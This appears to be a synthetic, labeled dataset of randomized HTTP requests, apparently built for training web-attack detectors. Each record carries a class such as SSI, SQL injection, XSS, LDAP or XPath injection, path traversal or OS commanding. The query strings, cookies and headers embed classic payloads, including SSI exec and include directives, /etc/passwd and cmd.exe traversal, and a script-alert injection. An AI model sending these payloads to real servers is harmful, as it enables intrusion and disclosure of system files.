Transfer-Encoding: compress
Upgrade: sJn/9.5, owof/5.6, ooi/5.8, beto/7.5
Warning: 336 www.pkli.gif "eE8hyyveresaci5o6et" 
X-Forwarded-For: 59.230.132.58
X-Serial-Number: 8223453
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45516
Start - Id: 39265
class: SSI
GET /ttV@d@jpSNUmF/iwd4uaLQCCA.aspx?iK3EQcE@ihYj=mej&tmt=4&aseseeHol=%26DdchildN&ilHteI=Miq8Kmrettc&tTeqeklaynSfhtc=hl9e1%26&e0rI=o&mlasamsl=te4ds0ty7&Mre7aNhsjhsaw=%3C%21--%23email+fromhost%3D%22www.SsadpgOC.com%22+tohost%3D%22mailbox.dTlR.com%22+message%3D%22r24krn+rtzewl+at+vaj%22+fromaddress%3D%22nsSohu.com%22+toaddress%3D%22fiXbc.hnlce.com%22+subject%3D%22m%22+sender%3D%22dac.com%22+replyto%3D%22vtctgie.com%22+cc%3D%22io%22+inreplyto%3D%22ril+noe+oAx%22+id%3D%22eUNmail%22+--%3E&wEjaGelto=xtat&%uroo=lztccEsbniiserj&rrurddrO2h=22&sRsu8tyekayn=4 HTTP/1.1
Host: 203.139.99.166
Connection: close
Accept: video/quicktime, video/mpeg;q=0.7, text/*;q=0.6
Accept-Charset: windows-874;q=0.7, x-mac-turkish;q=0.4
Accept-Encoding: *;q=0.5
Accept-Language: nd-dtNQ5
Cache-Control: no-cache
Client-ip: 154.176.125.112
Cookie: dntyRiqeeolrl=aw_;rdqevr4tanibyh=9377;des5tchot=03429728;eheoe2if=)tr8oeid2rt4;Af
Cookie2: $Version="1"
Date: Sat, 14 Mar 09 09:35:48 GMT
ETag: "HIPNOXACfKKzQ2mDTQ"
Expect: tnhoioon=ntmu;ndEx1r
From: ogpe@eKhmc.uk
If-Modified-Since: Sun, 29 Mar 09 08:35:32 GMT
If-Unmodified-Since: Thu, 11 Nov 04 22:47:46 CET
If-Match: *
If-None-Match: "DhzSYXLynhg3EnV5hUhi"
If-Range: Wed, 14 Feb 07 02:24:12 CET
Max-Forwards: 0023
MIME-Version: 1.6
Pragma: ipms='Mo0adag'
Proxy-Authorization: NTLM dGs2bnNEZXBhN2h0dG5ldlFCbnlkQXN0c25tcmFrb1B0YXVzbXlJbm9paFBsaTE=
Authorization: re4ttT enOa=dotDfoi
Range: 864-,5323-,-8736
Referer: http://www.xs30hh.ch/ssis/snoe/wfata0e.css
TE: gzip,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/4.6 (X11; U; Open BSD i586 9.9; qh-ot; rv:9.9.6) Gecko/06580027
UA-CPU: MIPS
UA-Disp: 3603,824,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 8684x662
Via: 2.4 www.l4t0snar.shtml, FTP/2.8 www.laped.shtml
Transfer-Encoding: deflate
Upgrade: etsi/0.2, 42Nn/6.7
Warning: 014 58.200.111.202 "ltrIo" 
X-Forwarded-For: 237.101.171.41
X-Serial-Number: 2940498240401251
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39265
Start - Id: 38317
class: LdapInjection
GET /re5az4dee3naaseeaah4/sa0nqht8a/tRO0@DAaiVjcr3Uq/grUautoexecGx7node/6xiesBrOt/rd8qEunAaea/kE8qpassthruo1wKNTDftpv-/svnw0areplaceE9/Nro49a.dll?teitorossneuy=nrtephpeRdsvwir&LprsIexoeegee=56401&lot0eza=5ujslhBzhR&fhttps2OY9gKbP=%29++++%28++%7C+++%28a9ws%3DNnWC*%29 HTTP/1.1
Host: 166.32.196.44
Connection: lhnt8Ae
Accept: video/quicktime, text/*;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: clzeaa-pshEi;q=0.9, retBc-nsTu6ni, oj03tTIL-wiee;q=0.2, roatrn-aeae, ia-So;q=0.9
Cache-Control: min-fresh=618
Client-ip: 2.55.18.28
Cookie: o1o83CDnnflh=r;ezm= tordeau e\idtds;u4qwVFfAMp=sfo9crno;Ltkh=1394;inFboJwTL=y6antd:js9cu>z
Cookie2: $Version="35"
Date: Mon, 01 Sep 08 08:39:25 GMT
ETag: W/"eYKeGvCQslKNy.3T8"
Expect: 100-continue
From: uiby5mca@ndt1oraj.be
If-Modified-Since: Wed, 21 Apr 10 21:17:29 GMT
If-Unmodified-Since: Sun, 07 Oct 07 15:44:36 UTC
If-Match: "zUwsr3Ut2Oo6_X@@8Y"
If-None-Match: *
If-Range: Sat, 20 Aug 05 10:12:03 CET
Max-Forwards: 89
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Basic dHRzc2U6YW10aA==
Authorization: Basic bmVPbmxzOnJ5bGF1
Range: 768701-8
Referer: /erEEaem.php4
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: ihtbpsei (uY2r1mDJhq; dtki80Z; oLwxDp; iUAzaS8.i6)
UA-CPU: 68000
UA-Disp: 6615,674,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 036x964
Via: ahc/4.2 98.75.232.168, 6.1 www.heon7.jpg
Transfer-Encoding: compress
Upgrade: ipd8o/8.2, wrthnk/5.7, ntg/1.8, rtt/1.6
Warning: 689 170.117.141.73 "aedmi" "Sun, 23 Jul 06 24:48:31 CET"
X-Forwarded-For: 36.43.147.188
X-Serial-Number: 055236562928
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38317
Start - Id: 35604
class: XPathInjection
GET /tdvS8s-/eurnJzo/eoblE_Wz5EDIqzHVd6p@/ivxrIIYU./kstyleI/ruUElYf2my@formHMj/n.xq5jUYhE27/FtSl5w/bt6esaEralsXeo.css?VtQhomeLtOxtermDo=9751&oeazxren8diT=a%2FXi%2Fhrz5m7%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D747%5D+++++or+%27riurnm%27++%3D++++%27&chhiq=B%24%5Dvozi&rtvij=O%2B&ogch=rT4cefaonJhLo9&eDe6esa0=ya%3FnAgoaltec%2B%7Cu9+pn&VGKUGYI6=system%28boimhcTtrelbetween HTTP/1.0
Host: 185.55.106.13
Connection: 1zlaur
Accept: image/*
Accept-Charset: windows-1250, iso-2022-kr;q=0.6, iso-8859-8-i
Accept-Encoding: deflate;q=0.4
Accept-Language: *
Cache-Control: no-transform
Client-ip: 132.226.188.115
Cookie: jin5TCJIN5pp=zph;zUar6vco=4nE;d7bscadajeesp=llthIoe;F144X=y5stdinca~ecd;n@bKTW=n4x
Cookie2: $Version="6"
Date: Sat, 03 May 08 06:03:04 UTC
ETag: W/"tF5Sw0AaliY@Erh7FZ"
Expect: 100-continue
From: hsgss@kOcgeesht.ch
If-Modified-Since: Sun, 28 Oct 07 03:42:36 UTC
If-Unmodified-Since: Fri, 05 Feb 10 24:23:56 UTC
If-Match: *
If-None-Match: "HvdHIFl-pKMGPb1k1hw"
If-Range: "EqszOohtJcbcnkQhD"
Max-Forwards: 5357
MIME-Version: 4.7
Pragma: o=nq1rfn
Proxy-Authorization: eNmRc aseer=gr3Gfc90
Authorization: Basic c3BoZGVpbDpubGlvaHNp
Range: 1278-6
Referer: http://www.s9ui.uk/gnbrect/2dd3q/aaimp/ayyOowhS/v5nwae.jsp
TE: chunked,trailers,gzip
Trailer: Host
User-Agent: Mozilla/6.5 (Machintosh; U; Mac OS X 8.5; an-33; rv:8.9.6) Gecko/39586229
UA-CPU: x86
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 138x439
Via: 4.4 www.erlu.jpeg, 0.3 99.180.156.149
Transfer-Encoding: compress
Upgrade: eto3T/9.1, 9rfo3l/2.2, nuUaek/3.0
Warning: 189 www.shodin.tiff:54 "hwauAetaeeeSes4" "Tue, 24 Mar 09 21:44:06 CET"
X-Forwarded-For: 168.99.224.77
X-Serial-Number: 65275952070459353
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 35604
Start - Id: 49737
class: XPathInjection
GET /oeru/anwSrrz/oSvjd/pZg@4NlSR-sm8Td/TNllh5toor8rt.js?Deiyhts7yfbs=9026&san=nn&tzTes=767&ibsdedhAhsrmxs=e.Dt-&ohci=do+%292&lirb9aljn4E=7&i5neodnnNclm=5&7mnaseuco=0076534&dkstilnrleelei=oan%27%5D++++%7C+++++P+++%7C+++%2F%2Fuser%5B++name%2Ftext%28%29++%3D++++%2778&oz=41&xevahidrRer=div1gecc HTTP/1.0
Host: www.jpnic5csh.cz
Connection: nUsAtv
Accept: audio/*, image/*;q=0.4, audio/*
Accept-Charset: iso-8859-3;q=0.8, iso-8859-8;q=0.6, x-mac-hebrew, gb2312, iso-10646-ucs-2
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: 6ror7niu=nLt
Client-ip: 24.134.122.55
Cookie: eeit8n=rood;cc=snBp2P6G;earatf=jJu;Nd=fxreplacehedlnadaotnea;XlERq=7AAe0az60s
Cookie2: $Version="05"
Date: Tue, 02 May 06 22:57:58 UTC
ETag: "-Dc1ZeBRZlf3FwUe"
Expect: 100-continue
From: ejeriHt@tvteeteb.fr
If-Modified-Since: Sun, 14 Mar 10 06:15:11 UTC
If-Unmodified-Since: Wed, 21 Feb 07 09:49:31 GMT
If-Match: "dQEuefFbIxp4tn.NinJ"
If-None-Match: "-3FzpY@tOfQqwYOBqG"
If-Range: *
Max-Forwards: 1337
MIME-Version: 0.1
Pragma: mn=b1l71e
Proxy-Authorization: Basic aXd5RWRhbmE6OHFuOGVuNGU=
Authorization: Basic aXRhc2xmMm46NGJhMw==
Range: -37003,-5,-1
Referer: /rlwdp/nesEn/orDms9s.exe
TE: trailers,gzip;q=0.9
Trailer: Connection
User-Agent: hiocin8ferSe5
UA-CPU: x86
UA-Disp: 3953,5444,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 4653x522
Via: anIn/6.4 www.akaoa.png:6
Transfer-Encoding: gzip
Upgrade: rsmt7a/2.2, ysy/1.0
Warning: 623 www.Cxer.gif "wenr" 
X-Forwarded-For: 91.230.146.163
X-Serial-Number: 9273829516846529
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49737
Start - Id: 40144
class: SSI
GET /mail@/eVl.WwKxWmpKI-vOA/5SDOtelnet5lib5q/mtonic5cwsrmo/rn.gif?aeht2ea=73493&efral9ow1n=925&eemT7iy3oys=%3C%21+++%23%3C%21--++++%23exec+++cmd%3D%22id%22--%3E&uc=u3uhperl%29%28ogtea&LR_jx31_qWcP=yt HTTP/1.0
Host: www.lAsotdg.de
Connection: close
Accept: image/*, audio/*;q=0.1
Accept-Charset: iso-8859-4;q=0.6, euc-tw, iso-8859-4;q=0.6, x-mac-arabic, utf-8;q=0.6
Accept-Encoding: *
Accept-Language: skoia-wpnbsn
Cache-Control: max-age=9739
Client-ip: 40.73.55.49
Cookie: tY-17=5NJwv;h5i8mllmoynle=4Ate]
Cookie2: $Version="9"
Date: Sat, 13 Mar 04 11:54:46 GMT
ETag: W/"uhP0g@xuC5h0Z.5MOH"
Expect: ocnesn
From: stce@ygsk.st
If-Modified-Since: Thu, 11 Mar 10 11:51:36 UTC
If-Unmodified-Since: Sat, 05 Aug 06 22:10:46 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 10 Sep 06 07:48:46 UTC
Max-Forwards: 53
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: iici 6rR5nn=rdoeN9um
Authorization: hhea kbvcna=cnsctd
Range: 01-76865,-324119,86535-
Referer: http://ndnTm.net/oawemat.css
TE: trailers,trailers
Trailer: Accept-Encoding
User-Agent: ortMsefRcr (jwR30Agf; lEDEcR; 9c4gUqanAT; l68KXf4t3L; 5WP5vH0Pak)
UA-CPU: MIPS
UA-Disp: 5908,939,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 5714x2082
Via: 3.9 136.238.48.161, 9.8 83.15.84.109, 5.5 5.187.78.98:4
Transfer-Encoding: identity
Upgrade: llr4iH/0.1, ihexp3/7.5, 4cG/7.6, txi/6.5
Warning: 318 191.70.190.146 "iieDaosahs2o" 
X-Forwarded-For: 17.71.219.93
X-Serial-Number: 7694674190970
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40144
Start - Id: 46293
class: PathTransversal
GET /fd8Fx_servicesI2B.html?einstl4kSneIto2=%2Fetc%2Fhttpd%2Fhttpd.conf&rdunwha=Oh+btaviehomened%7Eo&leseikq=nhttpelibEhttpssT%5C HTTP/1.0
Host: www.4rdu.cz:80
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: windows-874;q=0.8, euc-tw;q=0.7, windows-1255, iso-8859-15, cp-932
Accept-Encoding: *;q=0.5
Accept-Language: SI-hmuFsc;q=0.3, wdyfS-agnhn;q=0.5, n-nea, ir8le0r0-hiesh, aw-7cloi
Cache-Control: max-stale=180
Client-ip: 54.146.114.194
Cookie: eok=titt6toBtma
Cookie2: $Version="256"
Date: Sat, 17 Jun 06 18:54:24 UTC
ETag: W/"Tr79t_UXhl_B.uI5Su"
Expect: 100-continue
From: ysse83ei@yttEeHd.biz
If-Modified-Since: Sat, 28 Mar 09 04:09:29 CET
If-Unmodified-Since: Wed, 18 May 05 07:08:36 UTC
If-Match: *
If-None-Match: "BWYnQVYZZntYhMidtpH"
If-Range: Fri, 29 Oct 04 11:02:37 CET
Max-Forwards: 298
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic aGlFYTp3YXR0T24=
Authorization: Digest response="ac09Dfddbc6c311F1b7fbca4cD813C1F"
Range: 5-,07-2
Referer: /Eststh.txt
TE: chunked,trailers
Trailer: If-Unmodified-Since
User-Agent: tr8frHm (kZ-Jdqg)
UA-CPU: 68000
UA-Disp: 542,0115,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 1380x824
Via: 4.3 255.38.36.72:275, 6.0 www.Yotnu.htm
Transfer-Encoding: compress
Upgrade: seEc/8.9, 7elors/6.3, 4uhv/9.8, I5eg5m/5.5
Warning: 165 170.166.64.203:01144 "oSte0enOhlsosme9awi" 
X-Forwarded-For: 177.74.168.130
X-Serial-Number: 0260257
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46293
Start - Id: 40518
class: SSI
GET /re/oGJnD/2otgpflgeiuemhA7.pl?8uengi=0381031&xEZ-0PL.RFP=%3C%21--++%23include+virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22--%3E&fsmIrOnzh=b%3Fwes2hry%26+++osN&ooe=8881173839&ePYinsertlink=8admin&6W0kTasibnaHf=rjNR9EtBnjee&ejaetteew=breplacessxotnkqehtaccesoutaor+ HTTP/1.0
Host: www.ehAl.uk
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: hyeoe-al, t-utr3mdsg;q=0.3, xy-oeuEu0o;q=0.7
Cache-Control: min-fresh=4
Client-ip: 230.154.132.193
Cookie: adusc=75263;4rurao=tNhtieg;5@.OeHv=tshpb;QiFKKSreplacedD=)
Cookie2: $Version="480"
Date: Tue, 20 Dec 05 19:39:44 CET
ETag: W/"0HCHGnCBnWhjG4@"
Expect: easvet2=R7howlie
From: anl1@udeAd.net
If-Modified-Since: Tue, 14 Mar 06 05:44:49 GMT
If-Unmodified-Since: Sat, 04 Mar 06 13:19:01 UTC
If-Match: "pVqsDZeXGRcdjc."
If-None-Match: "EsETP1MTQ9lW0iEnw8"
If-Range: "cwd4ExOo_2EuUhW60"
Max-Forwards: 96
MIME-Version: 8.6
Pragma: u=eyEbn
Proxy-Authorization: dler dcyii=syes
Authorization: Basic aGhhMTplaHpo
Range: 9539-,9338-,-3373
Referer: /sAerm/r4t3u/t0ea/8tQis/eeabt.tar
TE: gzip,trailers,trailers
Trailer: If-Modified-Since
User-Agent: aXe2IxgT http://www.sEtAuuee.cz
UA-CPU: MIPS
UA-Disp: 591,998,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 278x2627
Via: 5.4 www.tlIyar6o.shtml, 6.6 189.132.41.73
Transfer-Encoding: compress
Upgrade: erf2/5.5, agh/2.9, dtoitg/7.9
Warning: 013 www.7sm6.png:35283 "lsedoeai3ucu" 
X-Forwarded-For: 252.212.230.66
X-Serial-Number: 4796093744
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40518
Start - Id: 35330
class: SqlInjection
GET /FlogW5/rIOmKy/xrefti/Sal3hfhnd7ynsSthka/set8wesqtae/swwkf0YO9R3fEA8L/0q/Sr2tEe89inths0iutheo.jpeg?coe8t7idiyas=389119&vjooeplr=OR+%27qtRctypled%27+%3D+++%27+++%27&Breplaceyay4S00WK=domey HTTP/1.0
Host: www.2oenhadehe.uk
Connection: iarhrudi
Accept: text/plain, text/*, text/*;q=0.8
Accept-Charset: *
Accept-Encoding: gzip;q=0.5, identity, identity;q=0.7
Accept-Language: chti-s;q=0.4
Cache-Control: min-fresh=301
Client-ip: 108.43.219.139
Cookie: Rx01ZL= 6otLiil;lNwi5Eh=0uoi >from;zu16brdet=eu2a?nszut;dtoslTe=e'use0AnZ;tuesclcdn2xpeob=cnjg;oIKsoesyFk=6943158653
Cookie2: $Version="17"
Date: Thu, 03 Apr 08 07:54:19 UTC
ETag: "QOvh8ehD1t657W06o5"
Expect: 100-continue
From: atozRhO@AwAlyrse.it
If-Modified-Since: Sat, 24 Dec 05 09:15:00 CET
If-Unmodified-Since: Sat, 27 Aug 05 21:39:06 CET
If-Match: "KvFFr2cdC@cpzIJyO_gF"
If-None-Match: *
If-Range: "BM1Ustp4NmIMcKnK"
Max-Forwards: 7698
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: h4ImO6 ttdnx=rtunlw9
Authorization: Birq o387tme=aaaoeew
Range: -22612,-1029,90558-
Referer: http://www.xdneanf.uk/at1kam/b0eli.msf
TE: trailers
Trailer: Via
User-Agent: iWisILn http://www.gy6dfhw.ch
UA-CPU: StrongARM
UA-Disp: 703,585,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 5578x419
Via: FTP/5.5 www.7qfsea.htm
Transfer-Encoding: gzip
Upgrade: i17B7t/8.0
Warning: 635 237.151.216.13:8 "tstkg" 
X-Forwarded-For: 111.116.93.90
X-Serial-Number: 31934378445962410
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35330
Start - Id: 46978
class: XSS
GET /y@x0t/rZdnlg.vo0edB/ePje6.css?zp9Stcnie=jrprslT4&CrQh7ad=%3Cstyle+++%3E%3C%21--%3C%2Fstyle%3E%3Cscript++++%3E%5Balert++%28%2737nimwt%27%29%3B%5D%2F%2F--%3E%3C%2Fscript+++%3E&yhnrumTdmcs=1hlo&paedtthtie=80&veaW76raateo=enmwp-te+1niRtikps&atsoOmujaa2En=kIqTo&h.Lqdivgo29rs=ny HTTP/1.0
Host: 65.254.175.3:5776
Connection: asrg
Accept: audio/*, audio/x-wav
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: no-transform
Client-ip: 248.231.55.234
Cookie: kSagioulsfle=erKHtdvyI
Cookie2: $Version="85"
Date: Tue, 17 Jun 08 20:50:12 GMT
ETag: W/"1RB7F6M.D6iD7VDJ1x"
Expect: lirmAu=bfd2
From: wj0oee@a4ld5r2exe.uk
If-Modified-Since: Wed, 01 Oct 08 22:51:45 GMT
If-Unmodified-Since: Sun, 25 Nov 07 04:58:07 CET
If-Match: "hOxhtMCvVseiRGi2K"
If-None-Match: *
If-Range: Fri, 23 Jul 04 10:17:27 CET
Max-Forwards: 3
MIME-Version: 0.1
Pragma: ihnH=igttas
Proxy-Authorization: NTLM dERkdGN0N2RobWhKb2VoY2M1dXJ1ZWlpaXNXenVuYTZoMGM=
Authorization: NTLM cnRkc2xvb3dwZHJqNXJlb3RlczJvd3BvdGRzbm5ncHZhc1RhdWFm
Range: -299,87-,670-62
Referer: /qu643asu/oaua9.pl
TE: deflate
User-Agent: set8z/3.8.9
UA-Disp: 2976,173,32
UA-Pixels: 199x2885
Via: FTP/6.1 10.144.201.252, ve38li/3.2 www.besdtn.tiff
Transfer-Encoding: gzip
Upgrade: 4il/0.7, 4aTrnW/6.9, 7fuM/5.0, sih/2.0
Warning: 973 www.oeahty.js "metfxElbimtcoqd5lot" 
X-Forwarded-For: 174.206.213.130
X-Serial-Number: 09560109
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46978
Start - Id: 38656
class: LdapInjection
GET /aw1evRy0t4m.swf?pnodeGwinntOO=bocatrhfrm&1sLBav=e7laettqrlHbrIr&TsitPiie=sld3arecufuw&cyneelLajs6bM=645&OBfOPuS=3aTx&AhsehlptdcitlKm=n&ae=18204&eeemat9eiHase5S=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&vTrcp3TVBdiv0T=anU HTTP/1.1
Host: 20.105.190.220
Connection: close
Accept: */*;q=0.5
Accept-Charset: utf-8;q=0.2, gb2312;q=0.0
Accept-Encoding: 
Accept-Language: ax-hdhMw6s;q=0.1, oar-wdE, nTire2-eN3c;q=0.8, Hiatn-aruS;q=0.0, tii2tr94-e
Cache-Control: max-stale
Client-ip: 33.193.152.43
Cookie: h9ryt2lkhtege3t=5bthfiasle;t62614hk1mC=BtaeaTU
Cookie2: $Version="47"
Date: Sun, 21 May 06 18:23:13 GMT
ETag: W/"NDTNAThFdSCA-p."
Expect: 100-continue
From: 0dbnE@pDEweao.biz
If-Modified-Since: Sun, 04 Jul 04 20:37:06 GMT
If-Unmodified-Since: Sun, 04 Feb 07 02:53:05 CET
If-Match: *
If-None-Match: "aQporVpJiu_M_E7c27fM"
If-Range: Thu, 28 Feb 08 14:52:46 GMT
Max-Forwards: 3
Pragma: no-cache
Authorization: NTLM ZG50MG91dGFlZGFyYzludGxlbm9uZUlJaHVsYzdpZWVzbE92MHJpenNuZ24=
Referer: /ihOls3a/denet/ecTiIn0/wZsdkta/nmor.wav
TE: gzip,trailers,trailers
User-Agent: Mozilla/1.4 (X11; U; SunOS sun4u 6.0; ut-et; rv:6.4.5) Gecko/49740985

null

End - Id: 38656
Start - Id: 46044
class: PathTransversal
GET /iA/hmeo/mDH.htm?tr=het1ragzgs&0ioebhtS=oentdjr&geucvutMi=50287&nhs=%24s+c1B%40eu11en&VkarKCoBVOR=etf&5ho=CoieZduh&lncjenfyq=rtwAE-adR4tg&taEp=umdocumentn7nasUxxas&triiej9Jedse=ecew&0m9opr=75&hpr9e=osgm HTTP/1.0
Host: www.pqvon.fr
Connection: close
Accept: */*;q=0.4
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: Imado-ne;q=0.8, aa-8a;q=0.0, rnlnjeA3-tk;q=0.3, ahhitbiW-Rrdt;q=0.8, Fenom5tg-dc
Cache-Control: no-store
Date: Wed, 22 Aug 07 21:58:15 UTC
ETag: W/"s3EvMhXH@ul3lOol.4t"
From: 83r0ove@Ahear.de
If-None-Match: "KDaHilOibIrbcDnZv"
If-Range: *
Max-Forwards: 1173
MIME-Version: 3.3
Authorization: 9ir3c dihuhu=adaeo
Referer: http://www.Drco.gov/Easenoc.htm
TE: gzip,deflate;q=0.9
User-Agent: ../../../../../../../../../etc/passwd
UA-Disp: 784,6015,32
UA-Color: color32
UA-Pixels: 5112x564
Via: 5.9 www.mnftbU.jpg, FTP/2.4 116.209.185.214, 2.9 108.153.205.35:02
X-Forwarded-For: 0.7.36.237
----: ------------

null

End - Id: 46044
Start - Id: 48309
class: XPathInjection
GET /eRBP57vq0/e.Pc@xsav3/tzB-_OeO98b-qB/uaq1NMJeWc@Osfa5Bb/ucm_wWx/a9AifD/UcmShsxMglandknN/cPt1MH2oBPbdt6M9AQ/e@jed/ub@lS-fsQ.php?mrntoeshoam=31814&tibanoilllt=Hlkw&hq=957&rllm=ss8tju2T5oarscHNc&AyY-At@D1p=91199&deTieyuHeeetIeh=hwC&gwneAt2gePuee=o+oaarb%40asl%3Eaaala&keswtAa=aygohacd&NpdS7=iunA&cnwrahhTa2r2=utql6 HTTP/1.1
Host: 25.13.192.48
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.8
Accept-Encoding: deflate, deflate;q=0.6, compress;q=0.9
Accept-Language: agstnenl-SeHrxCl;q=0.6, Htfja-obbnoh
Cache-Control: cl7wnre='drk1ce'
Client-ip: 95.235.160.12
Cookie: OvCL1=ai 0naowi@Y;ergeqdsddseiiS=lqe;sLaoe6bois=supdatennfaeO0Oxukm;s7rm=yua;xiBeeypn8=$aRnh
Cookie2: $Version="9"
Date: Fri, 17 Mar 06 22:11:14 GMT
ETag: "5iy6r8NdIpbUNk@VBE"
Expect: preieae1=rrnnt7r
From: eoohueg@assyib.com
If-Modified-Since: Sat, 26 Feb 05 07:01:52 GMT
If-Unmodified-Since: Fri, 21 Sep 07 23:08:43 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 6.0
Pragma: edgh='awAsmtn'
Proxy-Authorization: Digest nonce
Authorization: Basic aWVuc3dyOmJUcm5udXQ=
Referer: /1uihaha/dabEsEu/jeens.txt
TE: trailers,gzip
Trailer: Proxy-Authorization
User-Agent: 65817   or s/dNahd/u/child::node()[position()=4]   or   625=
UA-Disp: 296,6544,16
UA-Pixels: 433x249
Via: 5.1 www.cgDcrq.htm, FTP/1.1 51.255.105.88
Transfer-Encoding: identity
Upgrade: rkeue/0.5, esr10/3.0, 1eda/2.9, seo/9.6, 7lh/2.5
Warning: 413 www.Cr8n.js "i4qiee7ebn" "Thu, 05 Aug 04 06:10:01 UTC"
X-Forwarded-For: 49.73.220.16
X-Serial-Number: 17618194843
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48309
Start - Id: 39525
class: SSI
GET /ilipsa/iapbioiw.shtml?shutdownQ0vbK2iY0C=eeArpO&oeIbnn1l=13053&hseeTxa=35786&smrtev5e=58787&m5nwueritjee=59&G1froma0aY=9779212196&eEacsh=at6urhttsmwfabo&nymfnaboenlrF=atpassthru HTTP/1.0
Host: www.TdZc.biz
Connection: keep-alive
Accept: video/quicktime
Accept-Charset: *;q=0.6
Accept-Encoding: deflate
Accept-Language: Ohrrh-neab
Cache-Control: min-fresh=8412
Cookie: wpOtIC8gchild.bo=jraFemtfoe8cedo6m;yvehoaI=<!--  #include   virtual="/etc/httpd/httpd.conf"  -->;ytire5xrNw=oelsock_streamDec';egutnlm=EtoPntnObiAbp;OaYK6qkvTC=cNaeaj;4aCZkdropyhRNp=iIoalg"eDfeo;v
Cookie2: $Version="6"
Date: Mon, 03 Mar 08 21:47:46 GMT
ETag: "TfPCX0b-4egAHpkl"
Expect: 100-continue
From: ratp@hrud.cz
If-Modified-Since: Mon, 29 Dec 08 17:04:48 GMT
If-Unmodified-Since: Fri, 15 Jan 10 24:37:11 CET
If-Match: "DvISLX9H6xMhFl3r_vCO"
If-None-Match: "XdHmZl8.zhVDbotxuY"
If-Range: "IJX-0Fvv9W-tNWUbzo"
Max-Forwards: 52
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Digest qop=ioTsdw3n
Authorization: NTLM emFpZWlyYW9vc21uZWVpbHJhZXdjZW81YUllTHNlZWFybWhmcmE2dG9hc2U=
Range: 649-,-625813
Referer: /otxeyxs.html
TE: trailers,gzip;q=0.8,trailers
User-Agent: affzyldtwo (i@eOG8q2; uque82c1n; trboDp@t; spPDCoBad; bp5.tdV7BX)
UA-Disp: 147,913,8
Via: HTTP/7.7 200.160.25.99:27000
Transfer-Encoding: 7nalt; qen5sri=eapdd2Le
Upgrade: oin5d/6.0, 4EHtc/7.8
Warning: 643 www.Of6an7hu.tiff "ahmCgzcJ" "Thu, 08 Oct 09 18:26:52 UTC"
X-Forwarded-For: 81.239.118.138
X-Serial-Number: 219629
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39525
Start - Id: 44433
class: OsCommanding
GET ..%%35c../winnt/system32/cmd.exe? HTTP/1.0
Host: 55.7.180.88:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: min-fresh=368
Client-ip: 27.105.36.250
Cookie: s7Eehtacces=qnoe0dIEgro/\U;v78qeOG=0it;hcavT8pilWaqT=u$l$hotmailseusrhks;rltnrs99sloatea=xsEniw6L
Cookie2: $Version="74"
Date: Sat, 18 Oct 08 07:08:01 UTC
ETag: "2tnZ37xD4wGUw-x"
Expect: 100-continue
From: unh1Ohh@nhsboy.biz
If-Modified-Since: Fri, 18 Feb 05 24:23:10 GMT
If-Unmodified-Since: Sat, 13 Oct 07 16:08:45 UTC
If-Match: *
If-None-Match: "zyrhq9-I2ZwYaJGgyNd"
If-Range: "oS_d5-ZNmjCPGVHb"
Max-Forwards: 2
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: NTLM Y0xsZGlpbnRudWkyaTIxVW8yZnRla2lpdEd6cG9yZXN0
Authorization: x1Eeel biwme0eD=dHeEdo
Range: 6-02287,72753-
Referer: /gnml/eeedna/epsl8t.jsp
TE: deflate;q=0.1,chunked
Trailer: Proxy-Authorization
User-Agent: i@Ghsy http://www.ehrnznii.cz
UA-CPU: Sparc
UA-Disp: 712,4716,8
UA-OS: Mac OS X
